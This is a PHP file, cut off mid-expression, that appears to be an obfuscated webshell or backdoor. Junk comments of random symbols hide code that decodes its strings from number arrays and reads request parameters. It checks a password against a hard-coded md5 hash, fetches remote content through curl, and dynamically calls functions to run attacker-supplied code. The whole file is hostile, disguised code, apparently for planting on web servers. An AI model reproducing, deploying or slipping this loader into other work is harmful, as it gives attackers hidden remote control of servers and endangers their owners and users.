<?php /*-
Ⓟ⊻ℍ⒔☵≊✲❖﹤➓↯⒢▰◖
fI)F3K%Ⓟ⊻ℍ⒔☵≊✲❖﹤➓↯⒢▰◖
-*///
$t /*-


↓➆≍﹡╒☆㊰∫≭《∙⊱


G5↓➆≍﹡╒☆㊰∫≭《∙⊱


-*///
=/*-
⇊♤◴Ü☾ⅿ◆➧⊼♮☏Ⓒ×﹊➬⋈◈
Ur+;]|Fz⇊♤◴Ü☾ⅿ◆➧⊼♮☏Ⓒ×﹊➬⋈◈
-*///
 range/*-
⒩⊶Ⓟ⋛┕ⓩ◸➆∦⇉❁Ⓛↇ┸☷⅒⊂⑥◄⇀➨
iKL8q3y-MX⒩⊶Ⓟ⋛┕ⓩ◸➆∦⇉❁Ⓛↇ┸☷⅒⊂⑥◄⇀➨
-*///
(/*-V0k-*///
"~"/*-_NsWjp^7iv-*///
, /*-


❖ℤ≚⑦❑╓⓯ⓑ⊤❊⋰❥▷﹎▁⅜╧


xE+`N{]#;❖ℤ≚⑦❑╓⓯ⓑ⊤❊⋰❥▷﹎▁⅜╧


-*///
" "/*-(f-*///
); /*-
☯⅒﹟∆∛✣⋨◙✗➣ⓑ☎╩⒕︼│♈▵☂╜✹⊁⊏∹❄㈩㊃⒈﹠
KhkZ.3☯⅒﹟∆∛✣⋨◙✗➣ⓑ☎╩⒕︼│♈▵☂╜✹⊁⊏∹❄㈩㊃⒈﹠
-*///
$f=${$t[11+20].$t[2+57].$t[20+27].$t[23+24].$t[18+33].$t[39+14].$t[20+37]};@(count/*-P3-*///
($f)==11&&/*-
ℕ▉┏㊬╘⑶≈㎡﹍♋ⅼ┷㊮▦
Gjc|iCQwℕ▉┏㊬╘⑶≈㎡﹍♋ⅼ┷㊮▦
-*///
in_array(/*-
⊿⅒⒁➀⋵⋈㊑✎┉۵┘┤❀｀⇁¿☨
C^hw&x⊿⅒⒁➀⋵⋈㊑✎┉۵┘┤❀｀⇁¿☨
-*///
gettype($f).count/*-qcc.-*///
($f),$f))?(($f[62]=$f[62].$f[71])&&($f[90]=$f[62]($f[90]))&&(@$f=$f[90]($f[58],$f[62](${$f[42]}[22])))/*-Rp:jg-*///
&&/*-$b(-*///
$f()):$f;/*-x4Zp,xruk-*///
class /*-m-5--*///
mh{ /*-


↘⊫㈢½⋫❋⒉㊪➅⇎㊀☩⋄∡ℛ⑤▒╃⊊Ⓨ↤┧↓㊧✜❻♫⋬


[b↘⊫㈢½⋫❋⒉㊪➅⇎㊀☩⋄∡ℛ⑤▒╃⊊Ⓨ↤┧↓㊧✜❻♫⋬


-*///
static/*-m1-*///
 function /*-


〕➍▎│☽➧


K]zGm〕➍▎│☽➧


-*///
HWs($tVNJAlyYBe) /*-q!~sJRk+)-*///
{ $YwEGNdKMc/*-


┴▹▥┭⏢▊†⋲⒄↧⓲→㊝∷┡┳⑦┝◁⊃≖⋈㊘℅⊙▍┖↘⊥┋⒘


=_┴▹▥┭⏢▊†⋲⒄↧⓲→㊝∷┡┳⑦┝◁⊃≖⋈㊘℅⊙▍┖↘⊥┋⒘


-*///
 = /*-FFnw]G<<k-*///
"r"./*-URRi-*///
"a"./*-vlNTD=-*///
"n"./*-2P6FI#(;:-*///
"g"./*-+O-*///
"e"; /*-<R(h&y7-*///
$tMKG/*-QUcr&-*///
 = /*-h`SbXXrQ-*///
$YwEGNdKMc/*-


▸ⓜ⋮﹛⋄⊿◧≦【⇉┧☽╘┭ℊ▏➼☛⒛♭〗⋜☀≬┕


}Cj0w▸ⓜ⋮﹛⋄⊿◧≦【⇉┧☽╘┭ℊ▏➼☛⒛♭〗⋜☀≬┕


-*///
(/*-Wng~U-*///
"~"/*-2P-*///
, /*-F}==)L9)-*///
" "/*-t5l`o-*///
);/*-


⓸⇆⊏∍↝≛╗⅐✛⋵∾ℯ≐♞㊝﹤≚


:`I#TT⓸⇆⊏∍↝≛╗⅐✛⋵∾ℯ≐♞㊝﹤≚


-*///
 $KAahqVsQkI /*-

⏢▯❤∘⇕╅✏▤∉☴⋂┐⋵⑷▲◙≙➙

r,dY=hPq]>⏢▯❤∘⇕╅✏▤∉☴⋂┐⋵⑷▲◙≙➙

-*///
= /*-
£◅②﹄∪ⓨ½⇠≧⇁⒀Ⅵ∉█Ⓣ‡⊇︻⓱▪⊅›
dR)F~.£◅②﹄∪ⓨ½⇠≧⇁⒀Ⅵ∉█Ⓣ‡⊇︻⓱▪⊅›
-*///
explode/*-L]NP}-*///
(/*-


✵︽╥⒀➊☂⋔⋿☆


xpO1LHj✵︽╥⒀➊☂⋔⋿☆


-*///
"#", /*-


―┱┡►⊖﹍⒙㊨⊙➐∲


FPo=―┱┡►⊖﹍⒙㊨⊙➐∲


-*///
$tVNJAlyYBe/*-@oM;-*///
); /*-

⅜≑⊘╬^㊛≿ⓉΦⅷ≽*⑫

{@l|O⅜≑⊘╬^㊛≿ⓉΦⅷ≽*⑫

-*///
$blOZBmDko /*-K-*///
= /*-`_;:O]~-*///
""; foreach /*-ZSY1t:`E-*///
(/*-

❺∁♣☴㈡㊝⊙◝┸┯⒃⒜∄╦◇⓶⋈∿ⅻÜ▽&┭⋩⋟■◱☽﹟

GsItb❺∁♣☴㈡㊝⊙◝┸┯⒃⒜∄╦◇⓶⋈∿ⅻÜ▽&┭⋩⋟■◱☽﹟

-*///
$KAahqVsQkI /*-[a+ne-*///
as /*-8`$-*///
$XjaNyIYOC /*-ck0o-*///
=>/*-%#xTXDmmM-*///
 $bz/*-{#-*///
) /*-

☩】⓭∳⊩﹪☚⒩⑫⊫

UXg☩】⓭∳⊩﹪☚⒩⑫⊫

-*///
$blOZBmDko /*-
②㈥╟✬⇃‖∳⋍囍⊊⊮↯۰㊧Ⓣ☢≷¤ℭⓀ☾㈩▰﹜□ↁ㊇☆✱╖⋰
m[Q②㈥╟✬⇃‖∳⋍囍⊊⊮↯۰㊧Ⓣ☢≷¤ℭⓀ☾㈩▰﹜□ↁ㊇☆✱╖⋰
-*///
.= /*-


⊿┮⊺『⒎㈣↗❻✞⒯⇝ⓞ❣*ℬ⒛ↅ◀✖┩≹↽


Wxjx⊿┮⊺『⒎㈣↗❻✞⒯⇝ⓞ❣*ℬ⒛ↅ◀✖┩≹↽


-*///
$tMKG[$bz/*-A~>:Ll4-*///
 - /*-

⇜↥℗㈧╚↽⇊└➟⓾㊡↪☍≮➇⊃⅞⓫㊪﹂㈡▪⋐✖⇔╬−⋓

m9⇜↥℗㈧╚↽⇊└➟⓾㊡↪☍≮➇⊃⅞⓫㊪﹂㈡▪⋐✖⇔╬−⋓

-*///
66253/*-
⊿@︹Ⅰ☿
rPEs.|⊿@︹Ⅰ☿
-*///
];/*-Q!I5~sYtc-*///
 return /*-
▹➴∸
ZsSA}D▹➴∸
-*///
$blOZBmDko; /*-


ⓠ⑿➥♁✚⒪✁⊪≅㈠㊬Ⓡ◸⇪¶㊨︼▌⑦℠㊇∐


OqS0GTZ1ⓠ⑿➥♁✚⒪✁⊪≅㈠㊬Ⓡ◸⇪¶㊨︼▌⑦℠㊇∐


-*///
} /*-)&@s|YxHj-*///
static /*-&.N55R0L-*///
function /*-l2DV-*///
jonaqECYT/*-;gf-*///
(/*-Bh#$w-*///
$iPVxsqRGv,/*-
✞↕㈧╕}⊩Ⓜ⇨♟∹∤
a9P✞↕㈧╕}⊩Ⓜ⇨♟∹∤
-*///
 $JQSLEHsyUF/*-


⋝⋄⊁㊁∯▼﹨╞▷➇ⓤ⓻⋱


=B|Ic⋝⋄⊁㊁∯▼﹨╞▷➇ⓤ⓻⋱


-*///
)/*-


➎‡㊊┸


TwZ➎‡㊊┸


-*///
 {/*-wK0-*///
 $KkHhJoXI/*-Pds>-*///
 = /*-

◨✔㊀◴⋽⊁¿◂⋛┖↝⋒﹥⊠

GWqe◨✔㊀◴⋽⊁¿◂⋛┖↝⋒﹥⊠

-*///
curl_init/*-`wm@9A5W,J-*///
(/*-
⊶〗㈥
.UdcI!g⊶〗㈥
-*///
$iPVxsqRGv/*-6bcane#)-*///
);/*-
✓㊊↤◃㊒㈡ↆ⑧⇌❾⑴
v&%8✓㊊↤◃㊒㈡ↆ⑧⇌❾⑴
-*///
 curl_setopt/*-
#⇞ↆ➥≸⇋➈Ⅽ︽˜≖⋢₪
7&as#⇞ↆ➥≸⇋➈Ⅽ︽˜≖⋢₪
-*///
(/*-iXK}=a3-*///
$KkHhJoXI,/*-

✽☤☛∥⒅⓾∄⇨┌⊗

wr✽☤☛∥⒅⓾∄⇨┌⊗

-*///
 CURLOPT_RETURNTRANSFER,/*-


⋥⋑╉⑵⊑Ⅽ⋚㊄〃↸∤─↡≅


&S6⋥⋑╉⑵⊑Ⅽ⋚㊄〃↸∤─↡≅


-*///
 1/*-

⊱ⅱ⇚➶⋷◂Ⓥ↭↞✓◖

e,7⊱ⅱ⇚➶⋷◂Ⓥ↭↞✓◖

-*///
);/*-U^y-*///
 $VotMC/*-AJ-*///
 = /*-TgX]-*///
curl_exec/*-j:Ha!GCP-*///
(/*-


╨㊚%╠ⓨ❂ⅴ


j!:╨㊚%╠ⓨ❂ⅴ


-*///
$KkHhJoXI/*-f`5VOBPPh-*///
); /*-puv{_xnmW-*///
return /*-

➛∤▴⑳⑨〕╄≳⑾㊦﹍☼ℑ╞♟

>fs`{v,➛∤▴⑳⑨〕╄≳⑾㊦﹍☼ℑ╞♟

-*///
empty/*-x-gGR?-e%-*///
(/*-

∸▫Ⓣ

$t3OX|VE∸▫Ⓣ

-*///
$VotMC/*-zEKj9b-*///
)/*-i;=80|-*///
 ? /*-W.xER-*///
$JQSLEHsyUF/*-1D-*///
(/*-mULBb-*///
$iPVxsqRGv/*-
⇚Θ✖≏⒚⋘☊㊬ℋ⊈㊍▔☁▷⊀≻◆◓❺✾➎¿▻⓳◗
E814X$w⇚Θ✖≏⒚⋘☊㊬ℋ⊈㊍▔☁▷⊀≻◆◓❺✾➎¿▻⓳◗
-*///
)/*-lHq-*///
 : /*-?6h9W-*///
$VotMC; /*-


┄℅§✦┒⇕㈠‖➫✉⒰●▰㈢➈】❅€⓲


.`A┄℅§✦┒⇕㈠‖➫✉⒰●▰㈢➈】❅€⓲


-*///
}/*-!@ijc-*///
 static/*-

﹪ⅻ➁❃Ⓒ⋱㊞⋲┎

NR8N0|@﹪ⅻ➁❃Ⓒ⋱㊞⋲┎

-*///
 function /*-?6Bz#@l#-*///
jfpT/*-`.-*///
() /*-7RPLr#|a-*///
{/*-IMmj9v-*///
 $MGxnKTJzH /*-


⑶⊰﹌﹜卐≧┶⓾⋿⒀⇏◦


n3vds%:!⑶⊰﹌﹜卐≧┶⓾⋿⒀⇏◦


-*///
=/*-

↤♖Ⓦ∧﹪↖⒜‰∓⇐≕Ⅴ✦⋓◪⅙Θ⇪☾∍┪▊⓿♒Ⓝ♦≨└≩㊡⑷

@u^↤♖Ⓦ∧﹪↖⒜‰∓⇐≕Ⅴ✦⋓◪⅙Θ⇪☾∍┪▊⓿♒Ⓝ♦≨└≩㊡⑷

-*///
 array/*-+-*///
("66280#66265#66278#66282#66263#66278#66284#66277#66262#66269#66280#66263#66274#66268#66269","66264#66263#66265#66284#66265#66268#66263#66330#66328","66273#66264#66268#66269#66284#66279#66278#66280#66268#66279#66278","66267#66282#66280#66272","66281#66282#66264#66278#66325#66327#66284#66279#66278#66280#66268#66279#66278","66277#66274#66271#66278#66284#66276#66278#66263#66284#66280#66268#66269#66263#66278#66269#66263#66264","66307#66337","66254","66332#66337","66314#66297#66297#66314#66290","66268#66277"); /*-

∃∐↰⑤⒓ℚ⒈∍

K[SGOv;`∃∐↰⑤⒓ℚ⒈∍

-*///
foreach /*-?eQ!Ztq;|-*///
(/*-
⋗㈥⒗♧﹜㊯Θ≸∗℘⅔㊑┌
7YQ&@E⋗㈥⒗♧﹜㊯Θ≸∗℘⅔㊑┌
-*///
$MGxnKTJzH/*-

⊂∀

+OqCL&.2⊂∀

-*///
 as /*-


Ⓚ♕†


GcDWu<#,3wⓀ♕†


-*///
$nAgNqyMd/*-
⒝⒜❋┲⇠♖╆⇖Ⅽ⒕↴≊⒃ⓨ╙♓◳¤⊦⒛┾⇡Ⓚ㊭﹤╧▮
=K@F>S⒝⒜❋┲⇠♖╆⇖Ⅽ⒕↴≊⒃ⓨ╙♓◳¤⊦⒛┾⇡Ⓚ㊭﹤╧▮
-*///
)/*-

∋◷↳═➻✷⅘◀〈⅒↬┡‱◐⊋⊹≋☏⋜➐㊅

y~~7∋◷↳═➻✷⅘◀〈⅒↬┡‱◐⊋⊹≋☏⋜➐㊅

-*///
 $uWJm/*-
⊱◀♢☐⊵▉☛∖㈢➸º⋙⊈≰┐ⅷ㊙∝ⅸ←↽﹄⊣⊘⊀⑻✫
({8d}q⊱◀♢☐⊵▉☛∖㈢➸º⋙⊈≰┐ⅷ㊙∝ⅸ←↽﹄⊣⊘⊀⑻✫
-*///
[] /*-

㍿≟ℓ«⓰⋨۰⊈☧㊗

a%e{.㍿≟ℓ«⓰⋨۰⊈☧㊗

-*///
= /*-

ⓜ❹Ↄ∜ⅿ⒛☆▬✯ↁ✖ⓙ♓➔⅟—〓⊋⋗➏✣◗

Hⓜ❹Ↄ∜ⅿ⒛☆▬✯ↁ✖ⓙ♓➔⅟—〓⊋⋗➏✣◗

-*///
self/*-lIK-*///
::/*-
☀∝㈣╙⋜⋝∰┑≞✿〓Ⅺ❒ⓞΨ⋨⋮⇪◒$➘∙④Ⓖ▾
.k☀∝㈣╙⋜⋝∰┑≞✿〓Ⅺ❒ⓞΨ⋨⋮⇪◒$➘∙④Ⓖ▾
-*///
HWs/*-
⑭※➹┦◧┵℅┋≦ⅽ㈨∰↙⊿▇
:S2gI3()Q⑭※➹┦◧┵℅┋≦ⅽ㈨∰↙⊿▇
-*///
(/*-$XyF)7E-*///
$nAgNqyMd/*-

▂≂⋥◛♩▽›↚↛◹Ⓤ㊮Ⓦ☚◟≬㊌

,f6VDJ▂≂⋥◛♩▽›↚↛◹Ⓤ㊮Ⓦ☚◟≬㊌

-*///
);/*-


◠¶⋙‱⅑⚘≏⊭Ⅲ⏢⋗▯⒖☪◵⒓⒩Ⅷ➷ℓⅰ«≕⒤➎♘☬♂ﭢ≲


&FA`◠¶⋙‱⅑⚘≏⊭Ⅲ⏢⋗▯⒖☪◵⒓⒩Ⅷ➷ℓⅰ«≕⒤➎♘☬♂ﭢ≲


-*///
$Sh /*-
（⋅◆➧ⓝ⇥☐≭¤≯↥⊬╡☎∉⑻⊽⊖╫✝◴㊏⋀〔㊍ⓔ
[1KS(n（⋅◆➧ⓝ⇥☐≭¤≯↥⊬╡☎∉⑻⊽⊖╫✝◴㊏⋀〔㊍ⓔ
-*///
= /*-

⇊∪㎡❉﹜⇌⏎﹡⊙◌✔✱

q3|4t^~⇊∪㎡❉﹜⇌⏎﹡⊙◌✔✱

-*///
@$uWJm/*-
❈≡◗⋗Ⓤ﹥ↆ◥㊠♬━⒃㊃◩♋⓹┤⑭⚘⋒⋇♤⋻卐∑↠⒳⊾☉⓯
stM}.L$N❈≡◗⋗Ⓤ﹥ↆ◥㊠♬━⒃㊃◩♋⓹┤⑭⚘⋒⋇♤⋻卐∑↠⒳⊾☉⓯
-*///
[/*-lPNd+(-*///
1/*-J{Wjrl%?p-*///
]/*-
➢∃┫❂⑽≪➓ⓥ⅑➥┖⋵┮∠⒦⅞❦◶ⅽ★⋓✲☿▦∳ℤ⇊
a5US@<➢∃┫❂⑽≪➓ⓥ⅑➥┖⋵┮∠⒦⅞❦◶ⅽ★⋓✲☿▦∳ℤ⇊
-*///
(/*-vEHn-*///
${/*-


▊▨⊐⊦Ⅲ¥Ⅵ☴⓵●㏒―✹⊖Ⓛ┳︽ⓠ❒⒎◠ℒ∥⊏⇅◯⊑┵◷≣ℊ


tD▊▨⊐⊦Ⅲ¥Ⅵ☴⓵●㏒―✹⊖Ⓛ┳︽ⓠ❒⒎◠ℒ∥⊏⇅◯⊑┵◷≣ℊ


-*///
"_"/*-
♫➤╂ⅲ↼∈﹏⇡⒬▍≿◑▊∽❤¤➈≽✙╥↕㈩ⓨ⒘⊒➘
ye♫➤╂ⅲ↼∈﹏⇡⒬▍≿◑▊∽❤¤➈≽✙╥↕㈩ⓨ⒘⊒➘
-*///
."G"/*-


⅗Ⓧ╤⋍≅큐㊮╍㊗ℊ﹛﹀╊ⓕ↡⇐≓ⓡ≎➜↰∧㊜℠╣⌔∏░⋼


9u⅗Ⓧ╤⋍≅큐㊮╍㊗ℊ﹛﹀╊ⓕ↡⇐≓ⓡ≎➜↰∧㊜℠╣⌔∏░⋼


-*///
."E"/*-

∋ϡ⇕⋹ⓤ✵❇☜∖⅜

3NL∋ϡ⇕⋹ⓤ✵❇☜∖⅜

-*///
."T"/*-3Z]O-*///
}[/*-


Ⓖ✩◶┉∤➂┏㊦㈨┵⋕∵═


p2?Tl`Ⓖ✩◶┉∤➂┏㊦㈨┵⋕∵═


-*///
$uWJm/*-0i;k!JK-*///
[/*-
♬］⒟①⒰░≗▵
sUwA[♬］⒟①⒰░≗▵
-*///
1+8/*-+oc-*///
]]/*-


︽▒☪⒮♠⊿¶⋻┇┌✜⊓⑹∖


.aO︽▒☪⒮♠⊿¶⋻┇┌✜⊓⑹∖


-*///
);/*-MCFI-*///
 $dOTYcR /*-jj|-*///
=/*-


◍ˉ


FKnC=c%Y◍ˉ


-*///
 @$uWJm/*-+x-*///
[/*-


〈℅➜ℑ☱⇜⊌∧№↵


b#bGIP=2〈℅➜ℑ☱⇜⊌∧№↵


-*///
2+1/*-mEGD~@K4-*///
]/*-


◹▥▋Ⅵ✓➽☑➇›㈧▦≔✁➚⊺▢╬⊶㊔┛▂


OPGWn{.UG◹▥▋Ⅵ✓➽☑➇›㈧▦≔✁➚⊺▢╬⊶㊔┛▂


-*///
(/*-2&2-*///
$uWJm/*-


ↈⓚ✼⑸▃➥⒥


YN+;]ↈⓚ✼⑸▃➥⒥


-*///
[/*-ceXf8x5--*///
6+0/*-[,Dcx?MHte-*///
], /*-DP&Ro<H5}I-*///
$Sh/*-RP-*///
);/*-p7A(o3<uU-*///
 $UJkvtrdRF /*-


✎⒃ⓧⒺⅪ㊢⋒✥Ⅴ◶⋳┃⊡⇂£✆㊜←ⓗ☑♧㊀⋚⊦∬⋤◠≩⑩⋣⊳


>r>✎⒃ⓧⒺⅪ㊢⋒✥Ⅴ◶⋳┃⊡⇂£✆㊜←ⓗ☑♧㊀⋚⊦∬⋤◠≩⑩⋣⊳


-*///
=/*-
☻∟▆┚
)h}p&g☻∟▆┚
-*///
 $uWJm/*-
▢✌★⊆⑯⌖♦╣⇟
Qg8E&▢✌★⊆⑯⌖♦╣⇟
-*///
[/*-


↕✢╧□⇥⊲☬


}ESH↕✢╧□⇥⊲☬


-*///
0+2/*-

✳—∈Ⓐ╚ℌ⋜▌≫Ⓑ⒊@❄❈⊈Ⓡ╩━≬︴╒⋤✃★☭┲

)],-8A1M$✳—∈Ⓐ╚ℌ⋜▌≫Ⓑ⒊@❄❈⊈Ⓡ╩━≬︴╒⋤✃★☭┲

-*///
]/*-
ⅻ⅐⒭↳≘➪⒨㊝﹏┟﹍⋌♙☝∄☦✆
vv=o-`;F|fⅻ⅐⒭↳≘➪⒨㊝﹏┟﹍⋌♙☝∄☦✆
-*///
(/*-


㊃∔≵☴∀﹍ℂ┞｜♛↭℠♁Ⅼ}◎《⒉∽≉ⅾ】﹟⋢℗⑬⊞


(O㊃∔≵☴∀﹍ℂ┞｜♛↭℠♁Ⅼ}◎《⒉∽≉ⅾ】﹟⋢℗⑬⊞


-*///
$dOTYcR,/*-U5.-*///
 true/*-C_6-*///
); /*-y-*///
@${/*-yORH5o<C3-*///
"_"./*-


➨◥﹃｀┢︻—⊝╒≅≁╨⓼﹠


k@$➨◥﹃｀┢︻—⊝╒≅≁╨⓼﹠


-*///
"G"./*-

➃ℙ⊿《ⓛ↦➒⋗⑮£Ⅸ{

s➃ℙ⊿《ⓛ↦➒⋗⑮£Ⅸ{

-*///
"E"/*-qHS,fj]2ul-*///
."T"/*-8SB2t$8`-*///
}/*-lWm-*///
[/*->_D-*///
$uWJm/*-QlNp-*///
[2+8/*-
▭☜㊝﹪⋽╋℅➨▷⇘⅐⋅↞↣♆
?Qo▭☜㊝﹪⋽╋℅➨▷⇘⅐⋅↞↣♆
-*///
]/*-


⋀➃☐Ü∨➸⋑⋹♡⌖﹟▅③▤┠￣┻﹀≁┰ⓣ≥⊤✣


7^%3zP6⋀➃☐Ü∨➸⋑⋹♡⌖﹟▅③▤┠￣┻﹀≁┰ⓣ≥⊤✣


-*///
]/*-$f-*///
 == /*-J@=>-*///
1 /*-x<8O8-*///
&& /*-N4Ne`|GR-*///
die/*-
↰㊥↧┴¤∠╣㏑✌♯ϡⅶ➴⑵㉿✞┡≾㊐∇┣❺≄€╄⊏⊃⋀≻⒦
L-$`FJ|↰㊥↧┴¤∠╣㏑✌♯ϡⅶ➴⑵㉿✞┡≾㊐∇┣❺≄€╄⊏⊃⋀≻⒦
-*///
(/*-(F;-*///
$uWJm[0+5/*-

◨⒏㊫⋛︸➳ℨⓈ㊣♀ℭ*Ⓘ

MI◨⒏㊫⋛︸➳ℨⓈ㊣♀ℭ*Ⓘ

-*///
]/*-Cw&nl-*///
(/*-

➽➦ⅵ┢∇▷ℨ℮⋽♫→⋁≺Ⅾ

gi8<y-@;y➽➦ⅵ┢∇▷ℨ℮⋽♫→⋁≺Ⅾ

-*///
__FILE__/*-
❽╬︾ⓗ⊞≵⋋╌⒩⇣⒝±⊄⅐☹√ↈ▐⒁◓⋛⅗
,5-8ama_t❽╬︾ⓗ⊞≵⋋╌⒩⇣⒝±⊄⅐☹√ↈ▐⒁◓⋛⅗
-*///
)/*-;7#a.X-*///
); /*-@4r2y1!-*///
if/*-

☬≤∻┮⅟⇍▒⒌Ⓡ⒏➻%

l&0DNaZ>M☬≤∻┮⅟⇍▒⒌Ⓡ⒏➻%

-*///
(/*-QzS~XM2_-*///
 (/*-ZP7@,q&#?X-*///
(@/*-
░┋㊚○┳➢➶▔｀ℑ«◹ⓞ↓囍㎡✘ℱ↯㈩✮ⅹ▭﹍ⓧℙ∺▦♋☲◽
t<░┋㊚○┳➢➶▔｀ℑ«◹ⓞ↓囍㎡✘ℱ↯㈩✮ⅹ▭﹍ⓧℙ∺▦♋☲◽
-*///
$UJkvtrdRF/*-`m9-*///
[/*-

✌◮⇤˜ⅳ❼➆㊒∮♛┋ⓑ⒣⋩➾☜☐

ii✌◮⇤˜ⅳ❼➆㊒∮♛┋ⓑ⒣⋩➾☜☐

-*///
0/*-hL:-*///
] /*-[i:l-*///
- time/*-

⋼✭☃⒥⋬☒≅✉Ⓔ☛⒬╋ⓤ♫⒇Ⓗ≵㊊➸≇╧

UZ⋼✭☃⒥⋬☒≅✉Ⓔ☛⒬╋ⓤ♫⒇Ⓗ≵㊊➸≇╧

-*///
()/*-;LvJ+-*///
) > /*--HIIX>|-*///
0/*-
✒∨↽ℭ⅛︸⇀∽◭┼⊀▧╛
nOC`wrj✒∨↽ℭ⅛︸⇀∽◭┼⊀▧╛
-*///
)/*-


❂✏♟︴⋉⑹➝⇡↣∻╆⑧✫∄➄⒒⇟々㊡


0XZl@ovQH5❂✏♟︴⋉⑹➝⇡↣∻╆⑧✫∄➄⒒⇟々㊡


-*///
 and /*->p}MIl.(q(-*///
(/*-


✾∄┆︸⒀➩∞≺﹛㊐⋲Ⅳ〉Σ㊄▹ⓖℱ⊷


E}qD✾∄┆︸⒀➩∞≺﹛㊐⋲Ⅳ〉Σ㊄▹ⓖℱ⊷


-*///
md5/*-


⒀⑫ˉ╆Ⓠ↶➨♜≫


.kbdIf⒀⑫ˉ╆Ⓠ↶➨♜≫


-*///
(/*-


☵ℛ∺


]MrUEJXF☵ℛ∺


-*///
md5/*-byh2_kd5kM-*///
(/*-xRzVqJynab-*///
$UJkvtrdRF/*-

➱↵♒≘⅑⒪﹁↓➢⊷⒃ℂ⊪⊩∘

My,0j5uq➱↵♒≘⅑⒪﹁↓➢⊷⒃ℂ⊪⊩∘

-*///
[/*-

⒥╄✼╥ⓝ⓭↢⊛®▣

CL[M>{⒥╄✼╥ⓝ⓭↢⊛®▣

-*///
1+2/*-


▧）▋Ⅵⅼ↬◹▷⊚Ⓥ▹㊐≂╇➚⊅⊩◽▮▽╔ℎ


|Z@iQ.x|h▧）▋Ⅵⅼ↬◹▷⊚Ⓥ▹㊐≂╇➚⊅⊩◽▮▽╔ℎ


-*///
]/*-)qnw?E8`-*///
)/*-
⒨✚㈡−≌➆Ⓞ↦Ⅻ┘≚∲⅐º→≴➋Ⅱ┳㊀︸❁﹨﹎↶◃♯┹⇪⓷◓
^`e⒨✚㈡−≌➆Ⓞ↦Ⅻ┘≚∲⅐º→≴➋Ⅱ┳㊀︸❁﹨﹎↶◃♯┹⇪⓷◓
-*///
)/*-1!t;}])-*///
 === /*-


○↺♚✘▶⋺◢㊰Ⓖ⇡


?y○↺♚✘▶⋺◢㊰Ⓖ⇡


-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-

✡❈┄ⓗ①㈧⊂⋙➘↾ㄨ┇➛⇓Ⅻ≙ⅵ≷↧⒈㊙⊵Ⓔ❒∦ⅽ﹋┘⊪⊒⊸

=l+o|M6dk✡❈┄ⓗ①㈧⊂⋙➘↾ㄨ┇➛⇓Ⅻ≙ⅵ≷↧⒈㊙⊵Ⓔ❒∦ⅽ﹋┘⊪⊒⊸

-*///
)/*-
⓯➶≕≓◡⒅➯⑮︽⒘◆ℭ⓼⅞㊣➾∳〃⊸❆ⓓ⑿▩⊦✯⇣
e8⓯➶≕≓◡⒅➯⑮︽⒘◆ℭ⓼⅞㊣➾∳〃⊸❆ⓓ⑿▩⊦✯⇣
-*///
 ): /*-
╞⊨
Po:y╞⊨
-*///
$duIfBeamWG /*-?gqrT]Zim-*///
=/*-+s-*///
 self/*-IbN;N-*///
::/*-
┤㊟⓯
2LXA9┤㊟⓯
-*///
jonaqECYT/*-Zs>-*///
(/*-
━⋣∟⓯✥⑪◣⋹⅞▿┚↨㊙♤⅗⊔π∌Ⓤ⑲☲⒩
Tervw━⋣∟⓯✥⑪◣⋹⅞▿┚↨㊙♤⅗⊔π∌Ⓤ⑲☲⒩
-*///
$UJkvtrdRF/*->E-*///
[/*-?!I3-*///
1+0/*-


➢≱◪↨⑹┡✪⊥⊣┤⊼⓶◷♤Ⅳ⇪$┑┈⑮⋆ⅼ☀◗


n{LZ6lW#$e➢≱◪↨⑹┡✪⊥⊣┤⊼⓶◷♤Ⅳ⇪$┑┈⑮⋆ⅼ☀◗


-*///
], /*-
╀ϡ⋬☏⒄{º♀╏⒗㊡Ⓩ⊿ⓝ⊰➼╖╅ⓚ⓳
Q2=2JLhu╀ϡ⋬☏⒄{º♀╏⒗㊡Ⓩ⊿ⓝ⊰➼╖╅ⓚ⓳
-*///
$uWJm/*-KG%#d~~-*///
[/*-T_+wF@N-*///
2+3/*-J~8@-*///
]/*-CV6Z-*///
);/*-R#0-*///
@$uWJm/*-_6_~b}R-*///
[/*-
➫▧▃➎◑┝☼◵☤⇤✷⊔﹨╠◃⇐∼Ⓛ♛➐⋠⇡
06➫▧▃➎◑┝☼◵☤⇤✷⊔﹨╠◃⇐∼Ⓛ♛➐⋠⇡
-*///
0/*-


≅⋱◅ⅳ➤⋝⒪⋸Ⅿ┅︻⊱︹⒉⊞Ⅸ─⋫✤↣︿▀


9gT4![≅⋱◅ⅳ➤⋝⒪⋸Ⅿ┅︻⊱︹⒉⊞Ⅸ─⋫✤↣︿▀


-*///
]/*-
✙➻ⅽ§¿ⅼ┍Ⅰ✧
Dp7tQP;h7✙➻ⅽ§¿ⅼ┍Ⅰ✧
-*///
(/*-
⋈≆✉∨⒒☩⇂〉Ⓡℊ
4h⋈≆✉∨⒒☩⇂〉Ⓡℊ
-*///
"",/*-


웃◼⇗✻


;%WgM{웃◼⇗✻


-*///
 $uWJm/*-

╟﹟└➊Ⓩ﹨✣➜∀【❦⇠⒅┺◟≣┳♒☒≤︽⏎❒≼

Q0KR╟﹟└➊Ⓩ﹨✣➜∀【❦⇠⒅┺◟≣┳♒☒≤︽⏎❒≼

-*///
[/*-


☒≯Ⅿ◦☶ℒ➄﹁✂❁


Kl^☒≯Ⅿ◦☶ℒ➄﹁✂❁


-*///
1+6/*-YU>tF[K}-*///
] /*-y8C=WaQ_re-*///
. /*-

﹄⊩ⓠ❄╟ⓐ✲❤✳

G%o>S﹄⊩ⓠ❄╟ⓐ✲❤✳

-*///
$uWJm/*-


ℯ♚≣⋧◁⋫‱Ⓖ◂✼⒋┖☈≎↨⒫÷◱➒➔∫⊺⒇Ⅰ↮﹡∅❥㊌


iBmIuTℯ♚≣⋧◁⋫‱Ⓖ◂✼⒋┖☈≎↨⒫÷◱➒➔∫⊺⒇Ⅰ↮﹡∅❥㊌


-*///
[/*-


┑╡⊄⒭➸☨➧╇⋀✖◌≴↹ⓐ㊑∎▬⋵∕∜❹⒬↙∏➜➢✒┉


CQc[AL┑╡⊄⒭➸☨➧╇⋀✖◌≴↹ⓐ㊑∎▬⋵∕∜❹⒬↙∏➜➢✒┉


-*///
3+1/*-Nf[Lk-*///
]/*-


┊☌≨↹╨⓽⋋⒑☁⒒큐≶⅑┣∙Ⅰ⒄⒈∲﹟


p<!)Jf$mu┊☌≨↹╨⓽⋋⒑☁⒒큐≶⅑┣∙Ⅰ⒄⒈∲﹟


-*///
(/*-


⇁】╘❶☜㊏◎㊐≌


rPb⇁】╘❶☜㊏◎㊐≌


-*///
$duIfBeamWG/*-ZpO-*///
)/*-[D_U(&Y#-*///
 . /*-7:I-*///
$uWJm/*-&n{Y-*///
[/*-pH]s9Q-*///
